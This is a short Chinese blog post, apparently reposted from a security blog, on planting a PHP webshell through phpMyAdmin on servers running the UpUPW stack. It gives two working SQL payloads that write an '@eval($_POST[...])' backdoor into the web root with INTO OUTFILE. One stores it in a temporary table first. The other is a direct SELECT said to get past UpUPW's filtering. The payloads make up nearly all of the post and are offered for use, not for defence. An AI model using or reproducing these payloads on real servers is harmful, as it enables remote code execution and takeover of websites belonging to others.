首页 > 代码库 > upupw phpmyadmin写shell

upupw phpmyadmin写shell

废话:

upupw给我的感觉是一个充当了waf毁三观的垃圾程序。然而,我讨厌的程序,管理员都特别喜欢用。

你会发现直接用之前那套写shell的建表然后在值里添加shell代码写到一个路径不可以了。

CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES (‘<?php @eval($_POST[pass]);?>‘);SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE ‘d:/wamp/www/exehack.php‘;DROP TABLE IF EXISTS `darkmoon`;

直接可以使用:

select ‘<?php @eval($_POST[august])?>‘ into outfile ‘D://upupw/XXX.php‘;

 

upupw phpmyadmin写shell